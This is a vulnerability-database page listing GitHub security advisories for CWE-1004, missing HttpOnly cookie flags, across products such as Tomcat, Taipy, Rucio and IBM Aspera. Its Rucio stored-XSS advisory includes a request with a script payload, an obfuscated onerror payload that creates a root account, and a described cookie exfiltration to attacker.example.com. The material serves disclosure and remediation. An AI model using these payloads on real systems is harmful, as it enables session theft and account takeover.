CWE-1004
AllowedSensitive Cookie Without 'HttpOnly' Flag
Abstraction: Variant · Status: Incomplete
The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.
70 vulnerabilities reference this CWE, most recent first.
GHSA-PVJH-7H8Q-Q56R
Vulnerability from github – Published: 2022-05-14 02:42 – Updated: 2024-02-07 23:37The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat:tomcat"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.0.35"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2010-4312"
],
"database_specific": {
"cwe_ids": [
"CWE-1004"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-07T23:37:52Z",
"nvd_published_at": "2010-11-26T20:00:00Z",
"severity": "MODERATE"
},
"details": "The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.",
"id": "GHSA-pvjh-7h8q-q56r",
"modified": "2024-02-07T23:37:52Z",
"published": "2022-05-14T02:42:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4312"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608286"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/tomcat"
},
{
"type": "WEB",
"url": "https://launchpad.net/bugs/cve/CVE-2010-4312"
},
{
"type": "WEB",
"url": "https://security-tracker.debian.org/tracker/CVE-2010-4312"
},
{
"type": "WEB",
"url": "https://ubuntu.com/security/CVE-2010-4312"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Apache Tomcat has cookies without HTTPOnly flag in Set-Cookie header"
}
GHSA-PVXG-5348-RXVF
Vulnerability from github – Published: 2024-07-15 06:30 – Updated: 2024-07-15 06:30The session cookie in MailGates and MailAudit from Openfind does not have the HttpOnly flag enabled, allowing remote attackers to potentially steal the session cookie via XSS.
{
"affected": [],
"aliases": [
"CVE-2024-6739"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732",
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-15T04:15:02Z",
"severity": "MODERATE"
},
"details": "The session cookie in MailGates and MailAudit from Openfind does not have the HttpOnly flag enabled, allowing remote attackers to potentially steal the session cookie via XSS.",
"id": "GHSA-pvxg-5348-rxvf",
"modified": "2024-07-15T06:30:53Z",
"published": "2024-07-15T06:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6739"
},
{
"type": "WEB",
"url": "https://www.openfind.com.tw/taiwan/download/Openfind_OF-ISAC-24-007.pdf"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/en/cp-139-7928-04e8a-2.html"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-7927-03837-1.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QJP8-WWQ5-32HP
Vulnerability from github – Published: 2025-05-08 18:30 – Updated: 2025-05-08 21:32An issue was discovered in Znuny through 7.1.3. A cookie is set without the HttpOnly flag.
{
"affected": [],
"aliases": [
"CVE-2025-26844"
],
"database_specific": {
"cwe_ids": [
"CWE-1004"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-08T16:15:25Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered in Znuny through 7.1.3. A cookie is set without the HttpOnly flag.",
"id": "GHSA-qjp8-wwq5-32hp",
"modified": "2025-05-08T21:32:55Z",
"published": "2025-05-08T18:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26844"
},
{
"type": "WEB",
"url": "https://www.znuny.com"
},
{
"type": "WEB",
"url": "https://www.znuny.org/en/advisories/zsa-2025-05"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R3JQ-4R5C-J9HP
Vulnerability from github – Published: 2024-08-27 19:50 – Updated: 2025-01-21 18:28Summary
Session cookie is without Secure and HTTPOnly flags.
Details
Please take a look at this part of code (PoC screenshot) or check code directly (provided in Occurrences section below)
Occurrences: https://github.com/Avaiga/taipy/blob/develop/frontend/taipy-gui/src/components/Taipy/Navigate.tsx#L67
Proposed remediation: add Secure and HTTPOnly flags for cookies.
It could be like this:
document.cookie = tprh=${tprh};path=/;Secure;HttpOnly;;
PoC
Screenshot:
Impact
Secure: This flag indicates that the cookie should only be sent over secure HTTPS connections. Without this flag, the cookie will be sent over both HTTP and HTTPS connections, which could expose it to interception or tampering if the connection is not secure. HttpOnly: This flag prevents the cookie from being accessed by client-side JavaScript. It helps mitigate certain types of attacks, such as cross-site scripting (XSS), by preventing malicious scripts from accessing the cookie's value.
References CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute https://cwe.mitre.org/data/definitions/614.html CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag - https://cwe.mitre.org/data/definitions/1004.html OWASP - Secure Cookie Attribute - https://owasp.org/www-community/controls/SecureCookieAttribute Cookie security flags - https://www.invicti.com/learn/cookie-security-flags/ Cookie lack Secure flag - https://support.detectify.com/support/solutions/articles/48001048982-cookie-lack-secure-flag
Other: Title: Encrypting the Web URL: https://www.eff.org/encrypt-the-web
Update (Required advisory information) - added severity, resource: https://portswigger.net/kb/issues/00500200_tls-cookie-without-secure-flag-set
Best regards,
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.1"
},
"package": {
"ecosystem": "PyPI",
"name": "taipy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-47833"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-319",
"CWE-614"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-27T19:50:59Z",
"nvd_published_at": "2024-10-09T19:15:14Z",
"severity": "MODERATE"
},
"details": "### Summary\nSession cookie is without Secure and HTTPOnly flags.\n\n### Details\nPlease take a look at this part of code (PoC screenshot) or check code directly (provided in Occurrences section below)\n\n**Occurrences**:\nhttps://github.com/Avaiga/taipy/blob/develop/frontend/taipy-gui/src/components/Taipy/Navigate.tsx#L67\n\n**Proposed remediation:** add Secure and HTTPOnly flags for cookies.\n\nIt could be like this:\ndocument.cookie = `tprh=${tprh};path=/;Secure;HttpOnly;`;\n\n\n### PoC\n**Screenshot**:\n\n\n\n### Impact\n**Secure**: This flag indicates that the cookie should only be sent over secure HTTPS connections. Without this flag, the cookie will be sent over both HTTP and HTTPS connections, which could expose it to interception or tampering if the connection is not secure.\n**HttpOnly:** This flag prevents the cookie from being accessed by client-side JavaScript. It helps mitigate certain types of attacks, such as cross-site scripting (XSS), by preventing malicious scripts from accessing the cookie\u0027s value.\n\n**References**\n CWE-614: Sensitive Cookie in HTTPS Session Without \u0027Secure\u0027 Attribute https://cwe.mitre.org/data/definitions/614.html\n CWE-1004: Sensitive Cookie Without \u0027HttpOnly\u0027 Flag - https://cwe.mitre.org/data/definitions/1004.html\n OWASP - Secure Cookie Attribute - https://owasp.org/www-community/controls/SecureCookieAttribute\n Cookie security flags - https://www.invicti.com/learn/cookie-security-flags/\n Cookie lack Secure flag - https://support.detectify.com/support/solutions/articles/48001048982-cookie-lack-secure-flag\n\n**Other**:\nTitle: Encrypting the Web\nURL: https://www.eff.org/encrypt-the-web\n\nUpdate (Required advisory information) - added severity, resource: \nhttps://portswigger.net/kb/issues/00500200_tls-cookie-without-secure-flag-set\n\nBest regards,",
"id": "GHSA-r3jq-4r5c-j9hp",
"modified": "2025-01-21T18:28:45Z",
"published": "2024-08-27T19:50:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Avaiga/taipy/security/advisories/GHSA-r3jq-4r5c-j9hp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47833"
},
{
"type": "PACKAGE",
"url": "https://github.com/Avaiga/taipy"
},
{
"type": "WEB",
"url": "https://github.com/Avaiga/taipy/blob/develop/frontend/taipy-gui/src/components/Taipy/Navigate.tsx#L67"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/taipy/PYSEC-2024-168.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Taipy has a Session Cookie without Secure and HTTPOnly flags"
}
GHSA-RWJ9-7J48-9F7Q
Vulnerability from github – Published: 2026-02-25 18:58 – Updated: 2026-02-27 21:50Summary
A stored Cross-site Scripting (XSS) vulnerability was identified in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.
Details
A malicious payload supplied in the comment field is stored by the backend. When the rule is later viewed or approved, the stored script executes in the WebUI origin.
Create Path:
Monitoring > Subscriptions and Rules > Request New Rule > Options > Add Comment
Trigger Paths:
- User Trigger: Monitoring > Subscriptions and Rules > Show My Rules > RULE NAME
(https://localhost:8443/ui/rule?rule_id=<RULE_ID>)
- Admin Trigger: Data Transfer (R2D2) > Approve Rules > RULE NAME
Create Request
POST /proxy/rules/ HTTP/1.1
...
{"dids":[{"scope":"test","name":"dataset1"}],"account":"pentest","ask_approval":true,"activity":"User Subscriptions","rse_expression":"WEB1","copies":1,"grouping":"DATASET","lifetime":15552000,"comment":"<script>alert(document.cookie)</script>","asynchronous":false,"notify":"N"}
Response
HTTP/1.1 201 CREATED
...
["c2d675c1979d4549b26eede3531a7e6a"]
Creating RSE with XSS payload in comment
Reviewing rule creation requests
XSS Payload triggering on rule review
Impact
Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.
The impact is amplified by: - Session cookies that are accessible to JavaScript (missing HttpOnly flag). - API tokens exposed to the WebUI via JavaScript variables.
An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).
Attackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.
XSS Payload to Create Root UserPass
<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>
Remediation / Mitigation
All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.
Additional defense-in-depth measures include: - Enforcing a strict Content Security Policy (CSP). - Setting the HttpOnly flag on session cookies. - Avoiding exposure of API tokens in JavaScript-accessible variables.
Note that many pages were found setting the API token as
tokenin an authenticated response likevar token = "root-root-webui-...:"(See/ui/list_accountsfor example)
Resources
- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "35.8.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "36.0.0rc1"
},
{
"fixed": "38.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio-webui"
},
"ranges": [
{
"events": [
{
"introduced": "39.0.0rc1"
},
{
"fixed": "39.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25733"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T18:58:20Z",
"nvd_published_at": "2026-02-25T20:23:47Z",
"severity": "HIGH"
},
"details": "### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nA malicious payload supplied in the `comment` field is stored by the backend. When the rule is later viewed or approved, the stored script executes in the WebUI origin.\n\n**Create Path**: \nMonitoring \u003e Subscriptions and Rules \u003e Request New Rule \u003e Options \u003e Add Comment\n\n**Trigger Paths**: \n- **User Trigger**: Monitoring \u003e Subscriptions and Rules \u003e Show My Rules \u003e *RULE NAME* \n (`https://localhost:8443/ui/rule?rule_id=\u003cRULE_ID\u003e`)\n- **Admin Trigger**: Data Transfer (R2D2) \u003e Approve Rules \u003e *RULE NAME*\n\n**Create Request**\n```http\nPOST /proxy/rules/ HTTP/1.1\n...\n{\"dids\":[{\"scope\":\"test\",\"name\":\"dataset1\"}],\"account\":\"pentest\",\"ask_approval\":true,\"activity\":\"User Subscriptions\",\"rse_expression\":\"WEB1\",\"copies\":1,\"grouping\":\"DATASET\",\"lifetime\":15552000,\"comment\":\"\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\",\"asynchronous\":false,\"notify\":\"N\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\n[\"c2d675c1979d4549b26eede3531a7e6a\"]\n```\n\n**Creating RSE with XSS payload in comment**\n\u003cimg width=\"1032\" height=\"667\" alt=\"Creating RSE with XSS payload in comment\" src=\"https://github.com/user-attachments/assets/00258839-5288-48ed-856c-30cfee19d3c4\" /\u003e\n\n**Reviewing rule creation requests**\n\u003cimg width=\"1201\" height=\"625\" alt=\"Reviewing rule creation requests\" src=\"https://github.com/user-attachments/assets/1b5fc7af-a664-42dc-a3d4-b00755fe2bd7\" /\u003e\n\n**XSS Payload triggering on rule review**\n\u003cimg width=\"1197\" height=\"417\" alt=\"XXS Payload triggering on rule review\" src=\"https://github.com/user-attachments/assets/463e843a-1e9e-492e-960f-7d3edac2fd1e\" /\u003e\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)",
"id": "GHSA-rwj9-7j48-9f7q",
"modified": "2026-02-27T21:50:07Z",
"published": "2026-02-25T18:58:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25733"
},
{
"type": "WEB",
"url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/rucio/rucio"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
},
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Rucio WebUI Vulnerable to Stored Cross-site Scripting (XSS) through Custom Rule Function"
}
GHSA-W9QP-XC8F-8XCQ
Vulnerability from github – Published: 2024-07-26 12:35 – Updated: 2024-08-06 15:30This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to missing HTTPOnly flag for the session cookies associated with the router's web management interface. An attacker with remote access could exploit this by intercepting transmission within an HTTP session on the vulnerable system.
Successful exploitation of this vulnerability could allow the attacker to capture cookies and obtain sensitive information on the targeted system.
{
"affected": [],
"aliases": [
"CVE-2024-41685"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-26T12:15:02Z",
"severity": "MODERATE"
},
"details": "This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to missing HTTPOnly flag for the session cookies associated with the router\u0027s web management interface. An attacker with remote access could exploit this by intercepting transmission within an HTTP session on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to capture cookies and obtain sensitive information on the targeted system.",
"id": "GHSA-w9qp-xc8f-8xcq",
"modified": "2024-08-06T15:30:48Z",
"published": "2024-07-26T12:35:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41685"
},
{
"type": "WEB",
"url": "https://cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2024-0225"
},
{
"type": "WEB",
"url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2024-0225"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-WPW2-69V8-6F9H
Vulnerability from github – Published: 2024-09-25 03:30 – Updated: 2024-09-25 03:30IBM Aspera Console 3.4.0 through 3.4.4 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie.
{
"affected": [],
"aliases": [
"CVE-2022-43845"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-25T01:15:32Z",
"severity": "LOW"
},
"details": "IBM Aspera Console 3.4.0 through 3.4.4 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie.",
"id": "GHSA-wpw2-69v8-6f9h",
"modified": "2024-09-25T03:30:35Z",
"published": "2024-09-25T03:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43845"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7169766"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X7XC-36FH-7MVR
Vulnerability from github – Published: 2025-10-27 18:31 – Updated: 2025-10-28 15:30TRUfusion Enterprise through 7.10.4.0 exposes the encrypted COOKIEID as an authentication mechanism for some endpoints such as /trufusionPortal/getProjectList. However, the application uses a static key to create the encrypted cookie, ultimately allowing anyone to forge cookies and gain access to sensitive internal information.
{
"affected": [],
"aliases": [
"CVE-2025-27223"
],
"database_specific": {
"cwe_ids": [
"CWE-1004"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-27T17:15:37Z",
"severity": "HIGH"
},
"details": "TRUfusion Enterprise through 7.10.4.0 exposes the encrypted COOKIEID as an authentication mechanism for some endpoints such as /trufusionPortal/getProjectList. However, the application uses a static key to create the encrypted cookie, ultimately allowing anyone to forge cookies and gain access to sensitive internal information.",
"id": "GHSA-x7xc-36fh-7mvr",
"modified": "2025-10-28T15:30:42Z",
"published": "2025-10-27T18:31:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27223"
},
{
"type": "WEB",
"url": "https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27223.txt"
},
{
"type": "WEB",
"url": "https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise"
},
{
"type": "WEB",
"url": "https://www.rocketsoftware.com/products/rocket-b2b-supply-chain-integration/rocket-trufusion-enterprise"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-XJ56-Q6PV-VRX6
Vulnerability from github – Published: 2022-12-21 18:30 – Updated: 2022-12-28 21:30Sensitive Cookie Without 'HttpOnly' Flag in GitHub repository lirantal/daloradius prior to master.
{
"affected": [],
"aliases": [
"CVE-2022-4630"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-12-21T18:15:00Z",
"severity": "MODERATE"
},
"details": "Sensitive Cookie Without \u0027HttpOnly\u0027 Flag in GitHub repository lirantal/daloradius prior to master.",
"id": "GHSA-xj56-q6pv-vrx6",
"modified": "2022-12-28T21:30:22Z",
"published": "2022-12-21T18:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4630"
},
{
"type": "WEB",
"url": "https://github.com/lirantal/daloradius/commit/6878619dc661b3009429777a1aeeb383ddc0166b"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/401661ee-40e6-4ee3-a925-3716b96ece5c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-XXWW-73XW-X3FJ
Vulnerability from github – Published: 2023-06-13 06:30 – Updated: 2024-04-04 04:45Sensitive Cookie Without 'HttpOnly' Flag vulnerability in ABB REX640 PCL1 (firmware modules), ABB REX640 PCL2 (Firmware modules), ABB REX640 PCL3 (firmware modules) allows Cross-Site Scripting (XSS).This issue affects REX640 PCL1: from 1.0;0 before 1.0.8; REX640 PCL2: from 1.0;0 before 1.1.4; REX640 PCL3: from 1.0;0 before 1.2.1.
{
"affected": [],
"aliases": [
"CVE-2023-2876"
],
"database_specific": {
"cwe_ids": [
"CWE-1004",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-13T04:15:10Z",
"severity": "MODERATE"
},
"details": "Sensitive Cookie Without \u0027HttpOnly\u0027 Flag vulnerability in ABB REX640 PCL1 (firmware modules), ABB REX640 PCL2 (Firmware modules), ABB REX640 PCL3 (firmware modules) allows Cross-Site Scripting (XSS).This issue affects REX640 PCL1: from 1.0;0 before 1.0.8; REX640 PCL2: from 1.0;0 before 1.1.4; REX640 PCL3: from 1.0;0 before 1.2.1.\n\n",
"id": "GHSA-xxww-73xw-x3fj",
"modified": "2024-04-04T04:45:06Z",
"published": "2023-06-13T06:30:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2876"
},
{
"type": "WEB",
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001423\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Leverage the HttpOnly flag when setting a sensitive cookie in a response.
No CAPEC attack patterns related to this CWE.